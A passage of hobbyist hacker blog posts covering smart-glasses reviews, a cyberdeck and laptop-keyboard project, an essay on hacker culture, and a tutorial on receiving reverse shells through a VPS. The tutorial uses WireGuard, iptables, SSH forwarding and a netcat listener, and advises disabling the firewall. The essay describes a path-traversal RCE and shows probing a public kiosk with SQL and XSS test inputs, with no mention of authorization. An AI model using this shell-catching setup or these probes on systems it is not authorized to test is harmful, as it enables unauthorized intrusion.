You can hold the right touch pad to dictate a quick note, and hold the left touch-pad to ask a question to AI. The microphone dictation quality is remarkably good, it rarely messes up what you're asking. Any responses from AI are displayed as text in the lenses.</p>
There is another option for apps though, MentraOS. MentraOS is an app that connects to not only the G1s but a list of other smart glasses as well. MentraOS offers a cloud native operating system and app development platform. The apps require a websockets connection to Mentra's servers that then talk to the app on your phone, which sends the information to and from the glasses. I plan to make a few MentraOS apps, so stay tuned for that! MentraOS offeres some cool apps, but the default dashboard is not nearly as useful as the EvenReaslities app dashboard. But since the MentraSDK is opensource and you can write your own dashboard!</p>
Closing thoughts</h3>
These are really cool glasses, but the out of the box functionality is pretty limited. If all you want is a smartwatch on your face, then they're perfect for you. If you want to tinker on them and write some apps with MentraOS they are also fantastic. However if you're expecting them to be the AR device of the future you'll be sorely disappointed. For me they are exactly what I expected because I've watched a few reviews of them already and knew what I was getting into. As more third party apps become available and MentraOS gains more apps I think they have the potential to be a SOLID heads up display device for everyday life. As they are now, if you don't want to tinker with making your own MentraOS apps, I wouldn't recommend them unless your use case is fairly basic. By default they are basically just a smart watch on your face.</p>
TLDR: The hardware is great, but the software support is very basic. If all you want is a smart watch on your face they are a 100% recommend, but if you're hoping for a device with advanced capabilities then you'd better brush up on your coding skills and write some MentraOS apps, or wait until more apps are available.</p>


AR Glasses | My Thoughts on the Meta Display Glasses
2025-09-23T00:00:00+00:00
The Meta Raybans, no the other ones</h1>
Meta announced the release of their smart glasses with an in lens display. They feature a monocle display over the right eye that is transparent when not activated, touch controls on the arm bands similiar to their other non-display smart glasses, and the new "neuro band" bracelet for input as well. They do have a camera, microphones and speakers as well so voice control is of course supported and it talks to meta's AI.</p>
My thoughts</h1>
They are pretty cool, but there's some caveats. The first being that the full color display (admittedly super cool that its full color!) is a monocle display. meaning you only have it in one eye. This isn't the AR vision of the future where real world objects can be recognized and an overlay can be applied to them. This is more of a heads up display. That's fine, that's basically the state of the industry for these ultra low profile smart glasses, but it only being in one eye is a bit limiting as far as the screen real estate you have. The even g1s for example use a similar display technology, albeit monochrome and character/vector based instead of color and pixel based, but they have displays on both lenses. The upcoming rokid smart glasses also have dual displays, and an even larger field of view compared to the even g1s. Both the rokids and the even g1s are also more of a heads up display solution then a full AR solution, but in display tech at least they are closer to the AR vision of the future.</p>
The neuro band is super cool. I see things like that being the near future of "hands free" device control.</p>
But there's a big elephant in the room. This is meta. Let's be clear. This is facebook. You're expected to wear these at all times when you're awake. They have a camera and microphone. meta/facebook can data mine everything you look at, everything you say, and any sounds around you in order to build a profile of you to sell. Don't kid yourself, of course they are going to do that. That's their whole business model. This differs from devices like the quest line of VR goggles in a few key ways. First, you're not wearing the VR goggles at all waking hours. You're wearing them to accomplish a task or play a game. Second, The quest devices have decent onboard compute, so you don't lose really any functionality if you DNS blackhole all of meta/facebook's telemetry servers. With these, they rely heavily on servers and your phone to do the compute, especially with the AI features, so if you DNS blackhole meta/facebook's servers they will likely be severely nerfed. That privacy invasion alone is enough to make me pass on getting a pair for myself.</p>
While it hasn't been confirmed, it is likely that these will be locked to specifically meta/facebook's app for them, and Meta/facebook's AI. Compare that to the Even g1s, where you can choose your own AI backend, including self hosted OLLAMA instances, and while they haven't fully opensourced their SDK yet, they did opensource an example application that you can use to build your own apps for the glasses. There's even already and alternate app you can download that's completely opensource called MentraOS, which can talk to the even g1s, and that project has opensourced it's SDK.</p>
So overall my thoughts can be summed up as this: These are super cool. The tech is very impressive, but with more open options, even if they aren't as advanced yet, they don't provide enough to make me give up my entire daily privacy to use.</p>
Side note: I did order a pair of Even G1s, so when those get here I'll for sure make a post about my thoughts while using them, and my process in building my own applications for them. I'm going to look at both an app for MentraOS, and trying to write my own app with the reverse engineered BTLE api that's available on the unofficial EvenReality discord server.</p>
Sources:</h1>
https://www.meta.com/ai-glasses/meta-ray-ban-display/</a></p>
https://www.evenrealities.com/g1</a></p>
https://github.com/even-realities</a></p>
https://global.rokid.com/blogs/news/rokid-glasses-blend-ai-ar-and-style-in-a-featherlight-frame</a></p>
https://mentra.glass</a></p>


FyerBook Project Announcement
2025-09-04T00:00:00+00:00
Lessons Learned</h1>
I had a ton of fun designing and building the FyerDeck. But it failed it's primary goal. To take up less of a footprint, both in my bag and on a table, then that of a laptop. This obviously was not helped by needing to carry around the quest 3 as an integral component. Maybe once valve releases its new VR headset that is rumored to be standalone and run Linux we can build an interesting hacking device out of that... but until that happens we're on valve time. So, what did I learn. Designing things is damn fun! and maybe most importantly, mobile computing has been solved (at least for the time being) with laptops. There just simply isn't a better form factor for getting things done on the go. Case closed, just put all the framework parts back into the laptop chassis and call it a day right? WRONG.</p>
Next Steps</h1>
So laptops are the most optimal formfactor for mobile computing at the moment. Sure you can get a decent amount done with a smartphone and bluetooth keyboard now a days, especially with things like termux and Android's up coming virtualization system, but for dedicated hacking and coding a full fat laptop is still preferred. The base Framework13 isn't good enough for me though. Mainly in the keyboard department. Don't get me wrong, the Framework13 keyboard is among the best laptop keyboards I've used, but it's still a laptop keyboard in the standard qwerty layout. I find that normal qwerty layouts make me hunch my shoulders while typing, and if typing for hours on end this leads to significant muscle cramping and knotting in my upper back. I much prefer the alice layout for keyboards because the slight cant to the separated halves really helps keep my shoulders in a more neutral position.</p>
So just bring your keyboard with you and plug it in or connect via bluetooth. Well yes, I could do that, but what if I'm on a plane or in a car and I want to type without knotting my upper back any more then it normally is already? Sure I could just set my keybard on top of the keyboard built into the type cover... but like... that's so much more work. Why can't there just be a laptop keyboard that is alice layout?  This in lies my spark of an idea.</p>
Enter the FyerBook</h1>
I want to re-design at least the type cover of the framework laptop. I plan to either build my own custom keyboard using mechanical switches, hand wiring (or maybe a PCB.... haven't delved into that yet.) The design would be an alice layout keyboard with some modifications. The right enter and backspace keys will be replaced with normal sized keys, and have their functions changed because I want the backspace and enter keys to be on my thumb like I have them configured on my current daily driver the Cido ABM066. The keys should be low profile so they don't add too much to the thickness of the framework. I plan to re-use the existing framework trackpad and power button, this will keep the fingerprint functionailty, and honestly the trackpad is fine. I'd prefer a haptic trackpad, but this works just fine since I mostly use tap to click anyways.</p>
The idea will be to keep the majority of the framework laptop as is, but just design a new type cover. I may have to design a new bottom case as well, but we'll cross that bridge if it comes to that.</p>
I haven't started on this project yet, but in the comming weeks and months I will be making update posts as the project continues!</p>


What is hacking?
2025-08-25T00:00:00+00:00
What the Hack?</h1>
So you've heard of hacking. Of course you have. It's 2025, and hacking is a big topic, be it in video games, life hacks, cyber attacks, "hacky solutions", etc. But I bet you don't actually understand what hacking is. It's way bigger then you think.</p>
Hacking, a very misunderstood term. Even the merriam-webster dictionary has a way more limited definition then what it is in reality, though it does reflect the general public's definition of hacking.</p>
Hacking - Verb - to gain illegal access to (a computer network, system, etc.)</p>
This is certainly an example of what hacking can be used for, but this definition is very narrow and does not encompass hacking as we in the community use it.</p>
So what is hacking?</p>
The definition of hacking is actually very simple. Hacking is just using something in a way the creators of it didn't expect to achieve your goal. Creative problem solving would be a synonym.</p>
Let's take a basic example: the common table fork.</p>
A normal user would take a fork and think, "I use this to eat food." A hacker would look closely at the fork and examine its properties. Maybe a hacker can use the shape of the prongs to shape clay, or notice the fork is make of a conductive metal and can be used to complete a circuit.</p>
Red Neck engineering can also be a good example of hacking believe it or not!</p>
I like to say that Hacking is the modern implementation of the phrase "Knowledge is power."</p>
How does that relate to what I know about hacking though?</h1>
Great question! When you're attacking computer systems, that's all your doing! You're taking what you know about the components of a computer system and using that knowledge to do things that the administrator of that system may not actually intend you to do.</p>
A fun example is the classic James server remote code execution vulnerability. James server is an opensource Email server for Linux. It works by creating a new folder for each user to store their emails in. But what it didn't do was make sure the email addresses being created didn't contain certain characters that would allow users to specifically choose a folder on the system. For example you could choose an email address of ../../../../../../../../etc/bash_completion.d</code> which would put any emails that user received in the bash_completion.d folder... which is auto executed at startup. So you can just send a bash script as an email and the next time the computer reboots it will execute that script.</p>
As you can see with this example, hacking isn't an arcane art where you type really fast and say "I'm in!". Its simply understanding the systems you're attacking, and using that understanding to do things that you're not supposed to be able to do.</p>
Ok but hackers are bad right?</h1>
Nope! well sometimes... but mostly nope!</p>
From the hackers manifesto (1986),</p>
This is our world now... the world of the electron and the switch, the
beauty of the baud.  We make use of a service already existing without paying
for what could be dirt-cheap if it wasn't run by profiteering gluttons, and
you call us criminals.  We explore... and you call us criminals.  We seek
after knowledge... and you call us criminals.  We exist without skin color,
without nationality, without religious bias... and you call us criminals.
You build atomic bombs, you wage wars, you murder, cheat, and lie to us
and try to make us believe it's for our own good, yet we're the criminals.</p>
Yes, I am a criminal.  My crime is that of curiosity.  My crime is that of judging people by what they say and think, not what they look like.</p>
My crime is that of outsmarting you, something that you will never forgive me
for.</p>
Most hackers are just people who are always curious. People who aren't satisfied with seeing something. People who see that cool thing and NEED to know how it works. A hacker is simply a person with an insatiable thirst for knowledge. Someone who is constantly learning. Who has no box to think in at all. Most hackers just want to learn and poke and prod and figure things out. Hackers love doing things people say they can't do. Hackers make the world go round.</p>
hacking vs cybercrime</h1>
As seen in the dictionary definition of hacking, most people think its illegal to hack. This couldn't be farther from the truth. Hacking is not illegal, cybercrime is illegal. Not all hacking is cybercrime, and not all cybercrime is hacking. Hacking systems you have permission to hack is perfectly fine. This can be in the context of a penetration test, bug bounty, or hacking systems you own in order to learn more or build something new. Cybercrime is any illegal action using cyber systems. For example gaining access to networks and systems that you don't have permission to is hacking and cybercrime, but hosting illegal online content such as CSAM is also cybercrime, but doesn't involve hacking at all.</p>
Hacker culture</h1>
Hacker culture is a beautiful thing. Its a group of outcasts, people who never really fit in to the "popular" group getting together to be weird and learn more together. It's a culture of learning. Its a culture of wanting to do cool things, wanting to make the world a better place for everyone, one system at a time. Hacker culture advances technology faster then any other factor.</p>
A good movie representation of hacker culture in all its cringy glory is the 1995 cult classic "Hackers".  I will never claim that this is a good movie, but it is one of my favorites. It's goofy, the "hacking" in it is so bad, but it nails the hacker culture perfectly!</p>
The Hacker Mindset</h1>
Hackers all share a mindset. I would almost classify it as a mental illness to be perfectly honest. Its a NEED to know more. I NEED to know how that thing works and what I can make it do. I won't be able to relax until I do.</p>
For example, you see those kiosks in stores and malls. Well let's walk up to it and take a look. Oh there's a search box, we'll tap on that and the default android keyboard appears... so this runs android, neat. Are the button's accessible, nope. Ok, this is a search though, searches are mostly just front-ends for databases, generally speaking the way it works is what ever you type is used to build a sql query command, can we use that? It's expecting a string based search, strings need to be enclosed in '  characters for SQL queries, so maybe if we add a ' to the search it will fail and give us an error message! Oh I also notice that what you searched for are displayed at the top of the results page. So our input is used to build the HTML of the page... can we insert our own HTML tags to adjust that... lets make our search a head line by adding <h1>foooooooooooo</h1></code> does that change how it looks? Neat... can we add javascript tags? let's search <script>alert("foo")</script></code> does an alert window pop up?</p>
Closing thoughts</h1>
I hope you learned something. I hope you have a better understanding of what we as hackers are actually like. We're nerds. We're geeks. We love to turn knowledge into power. We are everywhere. Nothing and no one can stop the hacker movement.</p>
I will leave you with the entire text of the hacker manifesto written by The Mentor in 1986.</p>
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
The following was written shortly after my arrest...

                       \/\The Conscience of a Hacker/\/

                                      by

                               +++The Mentor+++

                          Written on January 8, 1986
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

        Another one got caught today, it's all over the papers.  "Teenager
Arrested in Computer Crime Scandal", "Hacker Arrested after Bank Tampering"...
        Damn kids.  They're all alike.

        But did you, in your three-piece psychology and 1950's technobrain,
ever take a look behind the eyes of the hacker?  Did you ever wonder what
made him tick, what forces shaped him, what may have molded him?
        I am a hacker, enter my world...
        Mine is a world that begins with school... I'm smarter than most of
the other kids, this crap they teach us bores me...
        Damn underachiever.  They're all alike.

        I'm in junior high or high school.  I've listened to teachers explain
for the fifteenth time how to reduce a fraction.  I understand it.  "No, Ms.
Smith, I didn't show my work.  I did it in my head..."
        Damn kid.  Probably copied it.  They're all alike.

        I made a discovery today.  I found a computer.  Wait a second, this is
cool.  It does what I want it to.  If it makes a mistake, it's because I
screwed it up.  Not because it doesn't like me...
                Or feels threatened by me...
                Or thinks I'm a smart ass...
                Or doesn't like teaching and shouldn't be here...
        Damn kid.  All he does is play games.  They're all alike.

        And then it happened... a door opened to a world... rushing through
the phone line like heroin through an addict's veins, an electronic pulse is
sent out, a refuge from the day-to-day incompetencies is sought... a board is
found.
        "This is it... this is where I belong..."
        I know everyone here... even if I've never met them, never talked to
them, may never hear from them again... I know you all...
        Damn kid.  Tying up the phone line again.  They're all alike...

        You bet your ass we're all alike... we've been spoon-fed baby food at
school when we hungered for steak... the bits of meat that you did let slip
through were pre-chewed and tasteless.  We've been dominated by sadists, or
ignored by the apathetic.  The few that had something to teach found us will-
ing pupils, but those few are like drops of water in the desert.

        This is our world now... the world of the electron and the switch, the
beauty of the baud.  We make use of a service already existing without paying
for what could be dirt-cheap if it wasn't run by profiteering gluttons, and
you call us criminals.  We explore... and you call us criminals.  We seek
after knowledge... and you call us criminals.  We exist without skin color,
without nationality, without religious bias... and you call us criminals.
You build atomic bombs, you wage wars, you murder, cheat, and lie to us
and try to make us believe it's for our own good, yet we're the criminals.

        Yes, I am a criminal.  My crime is that of curiosity.  My crime is
that of judging people by what they say and think, not what they look like.
My crime is that of outsmarting you, something that you will never forgive me
for.

        I am a hacker, and this is my manifesto.  You may stop this individual,
but you can't stop us all... after all, we're all alike.

                               +++The Mentor+++
_______________________________________________________________________________
</code></pre>
As always, stay curious, and go hack something.</p>


Hacking with XR: The Wins, The Fails, and The In-Between
2025-08-21T00:00:00+00:00
Hacking with XR:</h1>
It's 2025. Twenty Twenty-Five. Two Zero Two Five. Why does the world still revolve around flat panel displays like its the early 2000s? VR tech has been around for a while now, and there are even super promising AR solutions in the wild that you can buy right now on amazon for a not unreasonable price. So what gives, why aren't we all hacking like in the cyberpunk games and movies at this point? And more to that matter, now that VR/AR tech has advanced to this point... why do laptops still look like laptops from the 80s? Sure they're more sleek, but the basic design is more or less the same!</p>
Well dear reader. I built an XR Cyberdeck and used it as my exclusive computer rig at defcon this year where I participated with my team in the Red Team Villiage CTF, Blacks in Cyber CTF, and Biohacking Village CTF. The only screens I used to get hacking done while at Defcon were AR/VR (going to just lump them together with XR from here on) and I have some thoughts about where we are today!</p>
Wait XR Cyberdeck?!?!?!</h1>
Yeup. sure is. kinda.</p>
So I haven't made a blog post about it, but it is on my github. I call it the fyerdeck! Its made out of primarily Framework13 laptop parts and 3d printed parts. It actually works super well, for the most part... more on that later. I opted for the AMD Ryzen AI 9 mainboard so that I could get 12 cores and 24 threads of compute goodness with a decent GPU to boot. No complaints here. its ROCK solid for power, though the battery goes pretty quick with those power hungry chips. The primary displays I use for this were intended to be either my Quest3, or xreal AR glasses. If you'd like to know more about that project check out my github repo for it here</a>.</p>
XR Productivity Setups</h1>
Now that the hardware is more or less discussed, let's get to the setups.</p>
Quest 3</h2>
My first inclination was to use a project called StardustXR</a>
This is a Linux native 3d desktop environment. It aims to provide the basic building blocks to create new and exciting ways to interact with and use your computer, while still having the plumbing necessary to display legacy 2d applications. It does this well, for the most part. StardustXR is not quite finished yet, and there are problems and performance issues that I run into on my Cyberdeck. I have also tried it on my desktop to eliminate the performance issues of a mobile platform, and it works great there. Basically it lets you spawn windows for applications anywhere around you in 3d space! Who needs monitors when the world is your monitor? I then use WiVRn to wirelessly stream it to my quest 3 over WiFi. This setup works great on my desktop, but the Fyerdeck struggled with it a bit, and it tends to crash a bit more often that I would like to be usable as a hacking platform, but it is showing promise!</p>
So StardustXR is super cool, but isn't quite ready yet. What else?</p>
There's a software product out there called immersed</a>. Which lets you mirror screens from your computer to your VR environment. Any screen your computer can see can be mirrored (with caveats). See I do have a small screen on the Fyerdeck, but its mainly just to display a clock and let me type my LUKS decryption key. So I don't necessarily want to mirror that screen, nor would it be big enough to be usable. Enter KDE desktop portals and a fun little XDG script I pulled off of the Immersed discord server. This python script lets you use the KDE screen share portal to create a new virtual monitor to share. The monitors are hard-coded to 1920x1080@60hz. Which is fine... but higher res would be appreciated. But there's a catch. Each Application name for the screen needs to be different or weird things happen. No worries, just add multiple copies of the application to your application list in plasma and boom you're good to go. You can spawn up to 5 displays and mirror them in Immersed!</p>
This did work well. having 5 displays for a multimonitor setup while away from my house was incredible, but there was a major drawback. Comfort. See both StardustXR and Immersed require you to have a full VR headset in order to use them. No problem I have the quest 3 and even got a 3rd party head-strap that better distributes the weight. I've gamed with it for hours before so hacking in it shouldn't be a problem right? wrong.</p>
It wasn't so much the weight distribution, but the heat. The eye-box of the Quest 3 gets pretty warm. You don't notice when your immersed in a game, but when you're trying to focus on hacking a system and getting flags in a CTF it becomes a huge problem.</p>
The biggest saving grace the Quest 3 had was I would use my wireless mouse and keyboard from the couch while my cyber deck was plugged into the wall away from me and relax while hacking, which was cool... except for the proximity sensor on the quest 3 constantly thinking I had taken the headset off when it moves .00001mm farther away from my face.</p>
Ok so the quest 3 didn't work out for CTFing. What else do we have?</p>
Xreal Air Glasses</h2>
We have the AR glasses of course! These babies are 1920x1080p 120hz. No software required to run them, just plug into a USB-C port that supports display port alt mode and you're golden... with one catch. I have the Air 2 Pros, which are super cool, but they do not do any spatial compute on glasses. So they work, but the screen is just static, moving your head to look at things doesn't move the screen in your view-port. This has been fixed on the newer XrealOne glasses, but I haven't purchased a pair yet (I plan to).</p>
Another problem with the Xreal glasses is the fact that its just one screen. you can't have multiple virtual monitors that you turn your head to look at. The XrealOnes do have an ultrawide mode that gives you a MASSIVE screen to position your windows in, which helps, but its still no replacement for being able to open apps anywhere around you in 3d space, or being able to spawn any number of virtual monitors to use. Maybe they'll figure out how to add that in later versions (display port daisy chaining is a thing so maybe they could utilize a virtual version of that somehow...), but for now one screen is all you get, and if you're on the older glasses like me, one screen that's just 1920x1080.</p>
This setup let me do the CTFs and its what I used the most while at Defcon, but It would have been nice to have at least one more screen to spread my work space out over. I actually missed having the laptop screen to use as a second monitor while doing this.</p>
Which brings us to:</p>
Cyber deck vs laptop: FIGHT</h1>
I love this cyber deck. I really enjoyed designing it. But I have to admit... Its not very practical. My whole goal was to hopefully take up less space then a traditional laptop on our CTF table... but that didn't happen. The deck and keyboard were just too wide, and like I mentioned I missed having the full sized laptop screen to fall back on. So where does that leave us... am I just going to put my framework parts back in the framework case? probably for now, but this isn't the end.</p>
I want to design my own Framework laptop lower case, specifically the type cover. See one of the many benefits of my current setup is I can use my preferred keyboard layout (alice) which keeps my shoulders at a nice neutral angle while typing. I would hate to lose that while I'm on the go. Sure I could just bring my desktop keyboard with me (its pretty light) but where's the fun in that?</p>
So stay tuned, the FyerBook is coming soon. I'm going to mock it up with PLA to figure out the design I would like to use, then I'll send the designs to like PCBWay or something to have it CNC machined out of aluminum. I don't know if the entire lower shell will need to be redesigned, or if just the top cover will be, but I intend to find out! I'm also not 100% sure if I just want to make a snap on location for my desktop keyboard, or cannibalize one of KeyChron's low profile alice keyboards to put inside it... decisions decisions...</p>
Conclusion:</h1>
To TLDR: the future of using XR tech as primary displays is bright, if not quite ready yet. I'm super excited to see where it goes in the next 5 years. For now I'm going to still used the Xreal glasses as a primary display when on the go, and use a laptop screen as a secondary display when needed. All in all it was a cool little experiment, and I've learned a ton about 3d modeling from it, but alas the laptop design seems to have stuck around because its a good design that works well for its use case.</p>
Until next time readers, and as always go hack something!</p>


Catching shells from the Internet
2025-08-20T00:00:00+00:00
Catching shells from the internet!</h1>
Background information</h2>
So for this post you'll need a bit of background information to understand what we're talking about.</p>
The first thing you'll want to understand is what an IP address is. You can think of it as kindof like a street address for a house. It tells computers where other computers live so they can send information to them. If you open up your terminal application on your computer and type ipconfig</code> if you're on windows, and ip addr</code> if you're on Mac or linux you'll see some output that includes your private IP address. Wait private? Don't worry we'll get to that. It will likely start with a 192.168, 172.16, or 10.</p>
Everything that wants to talk over a network needs an IP address, including very large networks like the Internet. "But wait", I hear you say, "I don't type ip addresses into my browser to go to websites!". Right you are my dear reader. You probably type the domain name of the website you want to go to. For example FRSecure.com. Domain names are human readable addresses that point to IP addresses that computers like to use. Your computer basically sees you type the domain name, and asks a source of dns information (a dns server) what the current IP address is for that domain name. It then uses that IP address for the communications between your computer and the web server you're connecting to!  Cool Right!</p>
This actually gives us some interesting options when it comes to DNS like a post I'm going to make soon about how to block ads at the DNS level... keep your eyes peeled for that, its super cool!</p>
Ok so everything has an IP address even on the internet... so what. Well when the internet was young we didn't know how much it would explode. We figured that there was no way we'd need more then 4.2 billion addresses right? wrong! we ran out. Hence the invention of IPv6 which has alot more address space, but almost no one uses that... so we'll ignore it for now. Another solution came into existence. Private IP space. Private IP addresses are IP addresses that are not allowed to be on the internet, but are allowed on local networks. These IP addresses will start with either 192.168, 172.16, or 10.</p>
Ok cool, but then if they can't be on the internet why can you still connect online? Great question tiny reader voice in my head! See your Router has a public IP address, to see what it is simply type "Whats my ip" into google. All devices on your network share that public IP address for internet communication, and then use the private addresses we saw earlier for local communication. Cool Right! This is made possible by a technology called NAT or Network Address Translation. Basically it dictates how routers can keep track of out going connections to make sure that the replies to those are sent to the right local device. You may notice a problem here if you want to catch a reverse shell over the internet. Outgoing connections are tracked and used to make sure replies are sent correctly... but what about if a connection starts from the outside? These connections will be dropped. Making NAT the worlds most simple firewall that just blocks everything.</p>
Solutions</h2>
This is too long... whats the easiet way?</p>
b.... but I wrote all this up for you.... Fine....</p>
Set up a VPS on linode or digital ocean and then skip to the SSH Tunneling section below.... I'm not mad... just dissapointed.</p>
Portforwarding on your router</h3>
But I want to receive a connection from the internet. Me too dear reader, me too. Luckily we CAN! see most NAT implementations allow a procedure called Portforwarding. Basically it tells the router, "hey any connections originating from the internet connecting to us on this specific port, forward that connection to this specific device." Setting it up varies from router to router, but you can generally google your router model and portforwarding to figure it out.</p>
That's all fine and dandy but what if you have an ISP router that you don't have admin access to, or your ISP doesn't actually give you a public IP on your router's WAN interface (double natted)? Well lucky for you we have other options!</p>
Using a service to expose a port</h3>
One such option is to use a service to expose a port on your local machine to the internet. One such service is ngrok. I have not personally used ngrok, but it apparently works pretty well.</p>
A service I have used is Tailscale. Tailscale isn't a service to expose a port to the internet persay, but is a mesh VPN service that allows your devices to make direct connections to eachother even acrossed the internet! Pretty sick right! They have a function called Funnel that lets you set up a domain name that will connect to a specific machine on your tailnet. Of course one option with tailscale is to include the agent in your payload for getting the reverse shell, and just making the connection through the tailscale vpn... but that's.... a bit out of scope here (I haven't done that yet, but I do intend to!)</p>
Who needs a service?</h3>
Another option that I have used to quite good success is to spin up a small VPS on a hosting provider like linode or digital ocean, install a VPN server on it like wireguard or openvpn, then connect your computer to that VPN and portforward through the VPN connection. This sounds complicated, but its actually pretty easy. Below are the instructions to do this on linode, but it will be pretty similiar on other hosting providers. I like wireguard for its speed and security, but the setup with OpenVPN might be easier.</p>
Here are the instructions for Wireguard and Linode!</p>
First you'll need to create a linode account. Then you'll create a new linode, luckily there are ready to deploy images with VPN servers to make it easier!</p>
click on the create a linode button, then instead of filling out the information look at the top for a tab that says "Market Place".</p>
in the search bar go a head and type "wireguard" that should bring up the Wireguard image. Click on it, and scroll down until you see region and select the region that makes the most sense to you.</p>
scroll down a bit more until you see the sizing options. click on the shared CPU tab and select the smallest one you can.</p>
Once you hit go it'll take a few minutes to fully build and deploy it self, so go grab a coffee, or a beer... or a whisky..... or some weed what ever coats your scrote.</p>
Once the build process is done you can copy the ssh command and ssh into the server, using the root password you set during creation.</p>
Now that the linode is built we need to configure the server!</p>
Go a head and copy the ssh command out of the linode web console and paste it into your terminal, use the root password you set up during linode creation.</p>
Once you're logged in we'll first create a key pair for the server to use (it already has one, but we want a new one just incase!).</p>
Do this by running the following commands:
wg genkey | tee /etc/wireguard/server_private_key</code></p>
cat /etc/wireguard/server_private_key | wg pubkey | tee /etc/wireguard/server_public_key</code></p>
The first command creates a new private key for the server to use, the second generates a public key based on this private key.</p>
Now lets add those keys to our server's config file. Edit the file /etc/wireguard/wg0.conf</code> and where it says PrivateKey = (stuff)</code> replace the stuff with the private key we just generated.</p>
Now we need to make a client for us to use! let's create a directory to store the client configuration files. This will be useful if you want to create new clients at a later time, after all this is a fully functional VPN server, so if you want to keep your ISP from snooping, or be better protected on public wifi you can use this for that too!!</p>
mkdir /etc/wireguard/clients/</code></p>
now lets make a client for our attacking linux machine so we can catch a shell!</p>
nano /etc/wireguard/clients/attack_linux.conf</code></p>
you can use this template to set up the bare bones</p>
[Interface]
Address = 10.0.1.2/24
ListenPort = 51820
PrivateKey = <CLIENT_PRIVATE_KEY>

[Peer]
PublicKey = <SERVER_PUBIC_KEY>
PresharedKey = <CLIENT_PRESHARED_KEY>
AllowedIPs = 0.0.0.0/0
Endpoint = <SERVER_PUBLIC_IP>:51820
</code></pre>
cool, but now we need to generate a key pair for this client! we can do that in a very similiar fashion to how we generated the key pair for the server.</p>
wg genkey</code></p>
then copy the string it prints out and do</p>
echo 'the string you copied' | wg pubkey</code></p>
then we can add that to the client configuration file under the Interface section.</p>
Keep the public key somewhere, we'll need it when we add the client to the server as a peer.</p>
[Interface]
Address = 10.0.1.2/24
ListenPort = 51820
PrivateKey = the genkey thing you copied
PublicKey = the public key you generated

[Peer]
PublicKey = <SERVER_PUBIC_KEY>
PresharedKey = <CLIENT_PRESHARED_KEY>
AllowedIPs = 0.0.0.0/0
Endpoint = <SERVER_PUBLIC_IP>:51820
</code></pre>
Also add the server's public key to the Peer section where indicated, you can read it by running</p>
cat /etc/wireguard/server_public_key</code></p>
cool so we have our public private keys for both the server and the client to encrypt their communication, but what about authentication? that's important right?  SURE IS!</p>
We can simply generate a pre-shared key to use for authentication using the same wg genkey command!</p>
wg genkey</code></p>
Then copy the string and add it to the preshared key section of the client configuration!</p>
The final thing we need to do for the client is add the server's public IP address to the Peer section of our client configuration. You can get this by looking at the linode web console, or by running ip addr</code> in your ssh session.</p>
Cool, now all we need to do is add the client to our server as a peer. Open up the wg0.conf file</p>
nano /etc/wireguard/wg0.conf</code></p>
Add the following to the end of the configuration file:</p>
[Peer]
PublicKey = {your attack_linux_public_key}
PresharedKey = {the preshared key you generated}
AllowedIPs = 10.0.1.2/32
</code></pre>
replace the public key with your client's public key, and the presharedkey with the preshared key you generated, and its configured!</p>
now we just need to start the server.  Run the following</p>
wg-quick up wg0</code></p>
If there are no errors we can go a head and shut it down for now, because we will be enabling it to run at boot.</p>
wg-quick down wg0</code></p>
cool now to enable it to run at boot we can use systemd!</p>
systemctl enable --now wg-quick@wg0</code></p>
Wireguard should now be running! If you need to stop if for any reason you can run.</p>
systemctl stop wg-quick@wg0</code></p>
you can also manually start it with</p>
systemctl start wg-quick@wg0</code></p>
And if you need to just restart it you can run</p>
systemctl restart wg-quick@wg0</code></p>
Cool, we have a VPN server now... but so what, how do we catch shells?</p>
Easy, we portforward, through the VPN! See a VPN is basically just a fancy router. Did you notice those iptables commands in the post start and post stop sections of the configuration files? If not here they are:</p>
PostUp = iptables -A FORWARD -i wg0 -j ACCEPT; iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE; ip6  
tables -A FORWARD -i wg0 -j ACCEPT; ip6tables -t nat -A POSTROUTING -o eth0 -j MASQUERADE  

PostDown = iptables -D FORWARD -i wg0 -j ACCEPT; iptables -t nat -D POSTROUTING -o eth0 -j MASQUERADE; i  
p6tables -D FORWARD -i wg0 -j ACCEPT; ip6tables -t nat -D POSTROUTING -o eth0 -j MASQUERADE
</code></pre>
Understanding what these are specifically doesn't really matter for this post, but it does illustrate how iptables works on Linux, they make IP routing rules!</p>
So we can use IP tables to make a routing rule to port forward through the VPN tunnel!</p>
First run the following command to make sure that proper routing of the responses for any port forwarded ports.</p>
iptables -t nat -A POSTROUTING -j MASQUERADE</code></p>
Now for any port you want to forward you can run do the following:</p>
iptables -t nat -A PREROUTING -p tcp --dport (port you want to forward) -j DNAT --to-destination (your client IP):(port you want to forward)</code></p>
iptables -A FORWARD -p tcp -d (your client IP) --dport (port you want to forward -j ACCEPT</code></p>
For example if we want to catch a shell that will connect back on port 31337 with the example client we just created we would run:</p>
iptables -t nat -A PREROUTING -p tcp --dport 31337 -j DNAT --to-destination 10.0.1.2:31337</code></p>
iptables -A FORWARD -p tcp -d 10.0.1.2 --dport 31337 -j ACCEPT</code></p>
Now just save the client configuration on your attacking machine and use it to connect! There are a few ways to connect to the Wireguard VPN on linux, you can install the wireguard-tools package (at least that's what its called on arch linux) and just use wg-quick to start it, or you can add it to your network manager application, for example KDE Plasma allows you to import wireguard configuration files directly!</p>
Now just point your shell at the public IP of the VPS and start the listener on your attacking Linux machine!</p>
there has to be an easier way!</h4>
Well there are a couple.
The easiest would be to spin up a normal linux VPS on Linode, then install tailscale. Since tailscale already creates the mesh VPN you can add those same iptables rules mentioned above, just adjust the destination IP address to point to the tailscale IP address of your attacking linux host!</p>
BUUUUT</p>
</p>
SSH Tunneling</h3>
SSH can be used as a psuedo VPN itself! Crazy right! To do this we'll need to adjust the configuration of the ssh server already installed on our linode!</p>
nano /etc/ssh/sshd.conf</code></p>
find the line that reads:
#GatwayPorts no</code>
and change it to
GatewayPorts yes</code></p>
now we need to restart the ssh service</p>
systemctl restart sshd</code></p>
once that's done we can just spin up our shell listener on the attacking machine</p>
nc -nlvp 31337</code></p>
then use ssh remote port forwarding to forward the correct port!</p>
ssh -R 0.0.0.0:31337:localhost:31337 root@your_linode_public_ip</code></p>
if this doesn't work, you may have UFW running on your linode. You can disable that with
systemctl stop ufw</code></p>
you can make sure it doesn't run at boot with
systemctl disable ufw</code></p>
Conclusion:</h2>
